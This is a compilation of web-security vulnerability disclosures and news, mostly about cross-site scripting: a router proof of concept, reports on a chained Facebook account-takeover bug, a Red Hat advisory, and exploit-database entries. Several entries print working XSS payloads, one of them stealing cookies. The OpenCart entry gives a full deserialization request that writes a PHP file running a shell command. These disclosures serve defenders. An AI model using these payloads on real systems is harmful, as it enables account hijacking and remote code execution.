In FiberHome VDSL2 Modem HG150-Ub_V3.0, a stored cross-site scripting (XSS) vulnerability in Parental Control --> Access Time Restriction --> Username field, a user cannot delete the rule due to the XSS.

**CVE-2021-41946****Author: M. Afaq Abid**

PoC of CVE-2021-41946 - PTCL Modem HG150-Ub

**Stored Cross-site scripting (XSS) vulnerability in Parental Control.****Steps to Reproduce:**

1.  Go to login page of Modem (192.168.10.1)
2.  Advanced Setup --> Parental Control --> Access Time Restriction --> Username field
3.  Add this Payload:"><svg/onload=confirm(1);> in UserName field and add a rule.
4.  Go now Parental Control section and Stored XSS will executed.

Stored XSS prevent user to delete the rule now and this could be abused by an attacker to add restriction through Parental Control on a user and prevent them to delete that.

(Hard Reset Required to delete the Stored XSS)

PoC video for more details: https://youtu.be/mE46eNtyFIo

CVE-2021-41946: GitHub - afaq1337/CVE-2021-41946

Youssef Sammouda returns with more Facebook hacks – this time leveraging stolen Google authentication tokens to gain access to social media accounts

Emma Woollacott 18 May 2022 at 11:11 UTC

Youssef Sammouda returns with more Facebook hacks – this time leveraging stolen Google authentication tokens to gain access to social media accounts

Meta has fixed a series of bugs that could have allowed a malicious actor to take over a user’s Facebook account, paying their finder a $44,625 bug bounty.

Security researcher Youssef Sammouda was able to hijack the accounts of Facebook users who signed up using a Gmail account and use a Gmail OAuth id\_token/code to log in to the site.

And, he tells _The Daily Swig_, the same technique could have been used any other account: “Due to the complexity of developing such an exploit to do exactly that, I only submitted the exploit for the scenario that resulted in taking over Facebook accounts that authenticated with Google,” he says.

**Chained exploit**

The Facebook exploit leveraged a series of vulnerabilities, including a Logout CSRF bug allowing an attacker to force a victim to log out from their Facebook account in their browser and a Login CSRF bug allowing login to the attacker’s Facebook account inside the victim’s browser.

Meanwhile, a vulnerability in Facebook’s Checkpoint tool in allowed leaking any visited URL under Facebook.com to the Sandbox Domain; and, finally, an XSS vulnerability in the Facebook Sandbox Domain allowed the attacker to execute Javascript code in the context of the Sandbox Domain.

Chaining these allowed Sammouda to take over the accounts.

“We log out the user from their Facebook account, we force the login to the attacker’s Facebook account,” he explained

**RELATED** Fresh flaws in Facebook Canvas earn bug bounty hunter a second payday

“At this point, the attacker’s Facebook account is stuck at the Checkpoint tool; we redirect to Google OAuth which eventually redirects us to Facebook.com with a special token and code.

The researcher added: “Facebook.com leaks the token and code to the sandbox domain and we finally exploit the XSS bug to steal the token and code from the sandbox domain.”

**Coordinated disclosure**

Sammouda says the reporting process was efficient and straightforward: he reported the bugs to Meta on February 16, with the company fixing the issues on March 21. He received his payout on May 14.

This isn’t Sammouda’s first bumper bounty. Indeed, he’s reported a dozen Facebook bugs with similar payouts before.

Read more of the latest infosec research news

Last year, for example, he made $126,000 for discovering a set of three flaws in Facebook’s Canvas technology, with follow-up work netting him $98,000 earlier this year.

This latest payout, he says, “reflects the severity of the bug, and also how much Meta cares about the security of users accounts”.

We’ve invited Facebook to comment and will update if we hear anything further.

Full technical details can be found in Sammouda’s latest blog post.

**YOU MIGHT ALSO LIKE** Medical doctor charged with creating the Thanos ransomware builder

Facebook account takeover: Researcher scoops $40k bug bounty for chained exploit

An update is now available for Red Hat build of Quarkus.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2021-3914: smallrye-health-ui: persistent cross-site scripting in endpoint
* CVE-2021-22569: protobuf-java: potential DoS in the parsing procedure for binary data
* CVE-2021-29427: gradle: repository content filters do not work in Settings pluginManagement
* CVE-2021-29428: gradle: local privilege escalation through system temporary directory
* CVE-2021-29429: gradle: information disclosure through temporary directory permissions
* CVE-2021-43797: netty: control chars in header names may lead to HTTP request smuggling
* CVE-2022-0981: quarkus: privilege escalation vulnerability with RestEasy Reactive scope leakage in Quarkus
* CVE-2022-21363: mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors
* CVE-2022-21724: jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-05-18

Updated:

2022-05-18

**RHSA-2022:4623 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Moderate: Red Hat build of Quarkus 2.7.5 release and security update

**Type/Severity**

Security Advisory: Moderate

**Topic**

An update is now available for Red Hat build of Quarkus.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE links in the References section.

**Description**

This release of Red Hat build of Quarkus 2.7.5 includes security updates, bug fixes, and enhancements. For more information, see the release notes page listed in the References section.  

Security Fix(es):  

*   gradle: information disclosure through temporary directory permissions (CVE-2021-29429)
*   gradle: repository content filters do not work in Settings pluginManagement (CVE-2021-29427)
*   gradle: local privilege escalation through system temporary director (CVE-2021-29428)
*   smallrye-health-ui: persistent cross-site scripting in endpoint (CVE-2021-3914)
*   Quarkus Resteasy component may return Resteasy implementation details
*   netty: control chars in header names may lead to HTTP request smuggling (CVE-2021-43797)
*   jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes (CVE-2022-21724)
*   mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors (CVE-2022-21363)
*   quarkus: privilege escalation vulnerability with RestEasy Reactive scope leakage in Quarkus (CVE-2022-0981)
*   protobuf-java: potential DoS in the parsing procedure for binary data (CVE-2021-22569)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.  

The References section of this erratum contains a download link for the update. You must be logged in to download the update.

**Affected Products**

*   Red Hat Build of Quarkus Text-Only Advisories x86\_64

**Fixes**

*   BZ - 1949636 - CVE-2021-29429 gradle: information disclosure through temporary directory permissions
*   BZ - 1949638 - CVE-2021-29427 gradle: repository content filters do not work in Settings pluginManagement
*   BZ - 1949643 - CVE-2021-29428 gradle: local privilege escalation through system temporary directory
*   BZ - 2018015 - CVE-2021-3914 smallrye-health-ui: persistent cross-site scripting in endpoint
*   BZ - 2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling
*   BZ - 2039903 - CVE-2021-22569 protobuf-java: potential DoS in the parsing procedure for binary data
*   BZ - 2047343 - CVE-2022-21363 mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors
*   BZ - 2050863 - CVE-2022-21724 jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes
*   BZ - 2062520 - CVE-2022-0981 quarkus: privilege escalation vulnerability with RestEasy Reactive scope leakage in Quarkus
*   QUARKUS-1376 - Quarkus Resteasy component may return Resteasy implementation details

**CVEs**

*   CVE-2021-3914
*   CVE-2021-22569
*   CVE-2021-29427
*   CVE-2021-29428
*   CVE-2021-29429
*   CVE-2021-43797
*   CVE-2022-0981
*   CVE-2022-21363
*   CVE-2022-21724

**References**

*   https://access.redhat.com/security/updates/classification/#moderate
*   https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=redhat.quarkus&downloadType=distributions&version=2.7.5
*   https://access.redhat.com/documentation/en-us/red\_hat\_build\_of\_quarkus/2.7/
*   https://access.redhat.com/articles/4966181

**Red Hat Build of Quarkus Text-Only Advisories**

SRPM

x86\_64

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:4623: Red Hat Security Advisory: Red Hat build of Quarkus 2.7.5 release and security update

Persistent Cross-Site Scripting (XSS) vulnerability in Alexander Stokmann's Code Snippets Extended plugin <= 1.4.7 on WordPress via Cross-Site Request Forgery (vulnerable parameters &title, &snippet_code).

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of May 17, 2022 and is not available for download. This closure is temporary, pending a full review.

Simple, with preview and versatile.

Nice idea of a plugin. Sadly however php code doesn't work. Even the provided examples are not running as the " are all escaped. Too bad 🙁

allows us to add php anywhere using shortcodes. No more messing with functions.php file, making custom page templates or spawning child themes for a bit of custom logic. AMAZING

Thank you for this plugin! Helps me a lot!

I've tried several plugins to be able to add code easily and this one has always been the best experience of all. Surprised it isn't more popular!

Very very good! Using a very simple and a good helper!

Read all 10 reviews

“Code Snippets Extended” is open source software. The following people have contributed to this plugin.

Contributors

*    aftamat4ik

CVE-2022-29436: Code Snippets Extended

A researcher has combined a chain of bugs into an attack method that makes it possible to take over Facebook accounts linked to Gmail.
The post Gmail-linked Facebook accounts vulnerable to attack using a chain of bugs—now fixed appeared first on Malwarebytes Labs.

A security researcher has disclosed how he chained together multiple bugs in order to take over Facebook accounts that were linked to a Gmail account.

Youssef Sammouda states it was possible to target **all** Facebook users but that it was more complicated to develop an exploit, and using Gmail was actually enough to demonstrate the impact of his discoveries.

**Linked accounts**

Linked accounts were invented to make logging in easier. You can use one account to log in to other apps, sites and services. The most commonly used is the link between Facebook and Instagram, so we will use that as an example. Log in to one account and you are also practically logged in at the other. All you need to do to access the account is confirm that the account is yours.

Since 2009, Facebook has supported myOpenID, which allows users to login to Facebook with their Gmail credentials. To put it in a simpler way, this means that if you are currently logged in to your Gmail account, the moment you visit Facebook, you will be automatically logged in.

**Sandboxed CAPTCHA**

The first discovery that enabled this takeover method lies in the fact that Facebook uses an extra security mechanism called “Checkpoint” to make sure that any user that logs in is who they claim to be. In some cases Checkpoint present those users with a CAPTCHA challenge to limit the number of tries.

Facebook uses Google CAPTCHA and as an extra security feature the CAPTCHA is put in an iFrame. The iFrame is hosted on a sandboxed domain (fbsbx.com) to avoid adding third-party code from Google into the main domain (facebook.com). An iFrame is a piece of HTML code that allows developers to embed another HTML page on their website.

Now, for some reason, probably for logging purposes, the URL for the iFrame includes the link to the checkpoint as a parameter.

For example, let’s say the current URL is _https://www.facebook.com/checkpoint/CHECKPOINT\_ID/?test=test_. In that case the iframe page would be accessible through this URL: _https://www.fbsbx.com/captcha/recaptcha/iframe/?referer=https%3A%2F%2Fwww.facebook.com%2Fcheckpoint%2FCHECKPOINT\_ID%2F%3Ftest%3Dtest_

The attacker can replace the _referrer_ part in the URL by changing it into a _next_ parameter. This allows the attacker to send the URL including the login parameters to the sandbox domain. Now it is time to find a way to grab it from there, which is where cross-side-scripting (XSS) comes in.

**XSS**

XSS is a type of security vulnerability, and can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. Attackers can use a cross-site scripting vulnerability to bypass access controls such as the same-origin policy.

The same-origin policy (SOP) is where a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. This policy prevents a malicious script on one page from obtaining access to sensitive data on another web page.

In this case that step was easy, since Facebook allows developers to test certain features and makes it possible for them to upload custom HTML files. The creator can upload these HTML files to the fbsbx.com domain. Which, as we saw earlier, is also in use for the Google CAPTCHA. Which allows the attacker to bypass the same origin policy since the target site and the custom script are on the same domain.

**CSRF**

CSRF is short for cross-site request forgery. In a CSRF attack, an innocent end user is tricked by an attacker into submitting a web request that they did not intend. This may cause actions to be performed on the website that can include inadvertent client or server data leakage, change of session state, or manipulation of an end user’s account.

In his attack script, Youssef used undisclosed CRSF attacks to log the target user out and later log them back in through the Checkpoint.

**OAuth**

OAuth is a standard authorization protocol. It allows us to get access to protected data from an application. An OAuth Access Token is a string that the OAuth client uses to make requests to the resource server.

In this case, attackers can log out the current user and then log them back in to the attacker account which is in the Checkpoint state. But how does that allow the attacker to take over the Facebook account? By intercepting an OAuth Access Token string.

This is done by targeting a third-party OAuth provider that Facebook uses. One of these providers is Gmail. Gmail sends back the OAuth Access token to www.facebook.com for the logged in user. And since the attacker can steal the URL including the login parameters by sending them to the sandbox domain, they can intercept the OAuth Access Token string and the id\_token of the user.

**Takeover**

Summarized, the attacker can upload a script to the Facebook sandbox and try to trick his target(s) into visiting that page by sending them the URL.

Simplified, the script will:

1.  Log out the user from his current session (CSRF)
2.  Send them to the Checkpoint to log back in (CSRF)
3.  Open a constructed accounts.google.com URL that redirects the target to Facebook.

Once the target has visited the page with the script outlined above, the attacker can start harvesting the strings they need to take over the Facebook account.

1.  The attacker waits for the victim to log in and can later extract the Google OAuth Access Token string and id\_token
2.  Using the email address included in the id\_token they can start a password recovery process
3.  Now the attacker can construct a URL to access the target account with all the data they have gathered

**How to unlink accounts**

Some sites will offer to log you in using your Facebook credentials. The same reasoning that is true for using the same password for every site is true for using your Facebook credentials to login at other sites. We wouldn’t recommend it because if anyone gets hold of the one password that controls them all, you’re in even bigger trouble than you would be if only one site’s password is compromised.

You can check which accounts are linked to your Facebook account by opening the Facebook settings menu. Scroll down and open Settings & Privacy, then open Settings. At the bottom on the left, use the Accounts Center button. Tap Accounts & Profiles. There you can see a list ofthe accounts linked to your Facebook account. You can remove any unwanted linked accounts there.

**Facebook fix**

Youssef says he reported the issue to Facebook in February. It was fixed in March and a $44,625 bounty was awarded earlier this month.

We interviewed this Youssef last year. He told us he’s submitted at least a hundred reports to Facebook which have been resolved, making Facebook a safer platform along the way.

Gmail-linked Facebook accounts vulnerable to attack using a chain of bugs—now fixed

WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\pages\sections_save.php namesection2 parameters.

Sorry, something went wrong. Reload?

Sorry, we cannot display this file.

Sorry, this file is invalid so it cannot be displayed.

CVE-2022-30072: CVE/CVE-2022-30072.pdf at main · APTX-4879/CVE

Showdoc versions 2.10.3 and below suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)# Exploit Author: Akshay Ravi# Vendor Homepage: https://github.com/star7th/showdoc# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3# Version: <= 2.10.3# Tested on: macOS Monterey# CVE : CVE-2022-0967Description: Stored XSS via uploading file in .ofd format1. Create a file with .ofd extension and add XSS Payload inside the file    filename = "payload.ofd"  payload = "<script>alert(1)</script>"2. Login to showdoc v2.10.2 and go to file library    Endpoint = "https://www.site.com/attachment/index"3. Upload the payload on file library and click on the check button4. The XSS payload will executed once we visited the URL

Showdoc 2.10.3 Cross Site Scripting

OpenCart So Listing Tabs component versions 2.2.0 and below suffer from a deserialization vulnerability that can allow for arbitrary file writes.

    [-] Affected Versions:Version 2.2.0 is affected, and prior versions are likely affected too.[-] Vulnerabilities Description:Vulnerable component is switching to another tab. To exploitvulnerability, an attacker may send a POST request (withapplication/x-www-form-urlencoded content-type) to AJAX endpoint(usually "/index.php") with "is_ajax_listing_tabs" parameter set to"1" and "setting" parameter containing a PHP-serialized object,which would be deserialized at server-side. Gadget-chains based on PHPserver-side code can be used to gain remote code execution, filewrite, DOS, etc.So Listing Tabs is an Opencart plugin, so the Opencart PHP classes areavailable in webapp lifecycle. In source code of Opencart there is a PHPgadget-chain which allows to write a file to the server.Using this gadget, an attacker can write .php files with PHP code insideapp's web root and then execute it via requesting them, thus gainingremote codeexecution, which makes insecure deserialization in So Listing Tabsespecially dangerous. Ability to write files can also be used to DOS thesystem by writing large files and exhausting disk space, it can be used toperform XSS attacks by creating HTML files inside web root.Here is an example of request which will write PHP file on serverin /tmp directory:---POST /index.php HTTP/2Host: 0.0.0.0Content-Length: 3870Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://0.0.0.0/is_ajax_listing_tabs=1&ajax_reslisting_start=0&categoryid=p_date_added&setting=a%3a74%3a{s%3a6%3a"action"%3bs%3a9%3a"save_edit"%3b......s%3a2%3a"aa"%3bO%3A9%3A%22DB%5CMySQLi%22%3A1%3A%7Bs%3A21%3A%22%00DB%5CMySQLi%00connection%22%3BO%3A7%3A%22Session%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00adaptor%22%3BO%3A21%3A%22Twig_Cache_Filesystem%22%3A2%3A%7Bs%3A32%3A%22%00Twig_Cache_Filesystem%00directory%22%3BN%3Bs%3A30%3A%22%00Twig_Cache_Filesystem%00options%22%3BN%3B%7Ds%3A13%3A%22%00%2A%00session_id%22%3Bs%3A11%3A%22%2Ftmp%2Fff.php%22%3Bs%3A4%3A%22data%22%3Bs%3A24%3A%22%3C%3Fphp+system%28%22ls+%2F%22%29%3B+%3F%3E%22%3B%7D%7D}&lbmoduleid=157---[-] Solution:No official solution is currently available.[-] Disclosure Timeline:[28/01/2022] - CVE number assigned[31/01/2022] - Vendor contacted[02/02/2022] - Vendor asked for description of vulnerability[02/02/2022] - Send report to vendor[11/02/2022] - Vendor contacted for asking about updates[11/02/2022] - Vendor answered that did not get the report[11/02/2022] - Send report again[16/02/2022] - Vendor contacted to ask about receiving the report[17/02/2022] - Automatic generated answer about overloaded system[07/04/2022] - Vendor contacted again asking for updates[15/05/2022] - Vendor contacted to notify about public disclosure[16/05/2022] - Vendor contacted to notify about public disclosure toenother email[16/05/2022] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the id CVE-2022-24108 to these vulnerabilities.[-] Credits:Vulnerability discovered by    Denis Mironov (SolidSoft LLC),    Alexey Smirnov (SolidSoft LLC),    Daniil Sigalov (SolidSoft LLC),    Dmitry Pavlov (SolidSoft LLC),    Maxim Malkov (SolidSoft LLC)

OpenCart So Listing Tabs 2.2.0 Unsafe Deserialization

T-Soft E-Commerce version 4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)# Exploit Author: Alperen Ergel (alpernae IG/TW)# Web Site: https://alperenae.gitbook.io/# Software Homepage: https://www.tsoft.com.tr/# Version : v4# Tested on: Kali Linux# Category: WebApp# Google Dork: N/A# Date: 2022-05-10# CVE :N/A######## Description ########## 1-) Login administrator page and add product# # 2-) add product name to xss payload ## 3-) Back to web site then will be work payload########## Proof of Concept ########========>>> REQUEST <<<=========POST /Y/Moduller/_Urun/Ekle/Action.php HTTP/1.1Host: domain.comCookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxxx@xxx.com; customDashboardMapping=true; PHPSESSID=18d05ae557640c93fd9739e241850438; rest1SupportUser=0; nocache=1; last_products=12User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 1028Origin: https://domain.comDnt: 1Referer: https://domain.com/srv/admin/products/save-edit/index?id=12Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closetask=UPDATE&Kategori=18&UrunId=12&UrunAdi={PAYLOAD}&MarkaId=0&MarkaAd=&ModelId=0&ModelAd=&Tedarikci=0&TedarikciKodu=12&StokSayisi=100&StokBirimId=1&StokBirimAd=Adet&EnYeniUrun=0&EnCokSatilan=0&AramaKelimeleri=&HamSatis=200&AlisFiyat=100&HavaleYuzde=0&Birim=0&KDV=18&KdvGoster=false&point_catalog=false&IndirimliUrun=true&AltUrunVar=false&YeniUrun=true&AnaSayfaUrun=true&VitrinUrun=false&Gorunme=true&BayiUrun=false&SiparisNotuGoster=false&En=0&Boy=0&Derinlik=0&Agirlik=0&Desi=1&GarantiBilgisi=&TeslimatBilgisi=&UrunNot=&WsUrunKodu=T12&SeoAyar=3&SeoTitle=&SeoLink=deneme-urun-1&SeoDesc=&SeoKeyw=&Detay=%C3%9Cr%C3%BCn%20ekleme%20konusunda%20detayl%C4%B1%20bilgi%20i%C3%A7in%2C%20videomuzu%20izleyebilirsiniz%3A%C2%A0%0A%3Cdiv%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%22%3Ehttps%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%3C%2Fa%3E%3C%2Fdiv%3E&AnaKategoriId=18&point=0&subscribe=0&subscribe_frequency=&subscribe_discount_rate=0&UruneKargoUcretsiz=0&UyeUcretsizKargo=0&BayiUcretsizKargo=0&Sayisal1=0

T-Soft E-Commerce 4 Cross Site Scripting

Survey Sparrow Enterprise Survey Software 2022 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)# Date: May 11 2022# Exploit Author: Pankaj Kumar Thakur# Vendor Homepage: https://surveysparrow.com/# Software Link: https://surveysparrow.com/enterprise-survey-software/# Version: 2022# Tested on: Windows# CVE : CVE-2022-29727# References:https://www.tenable.com/cve/CVE-2022-29727https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022#POCFor Stored XSSVisithttps://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//XSS Executed

Tag

#xss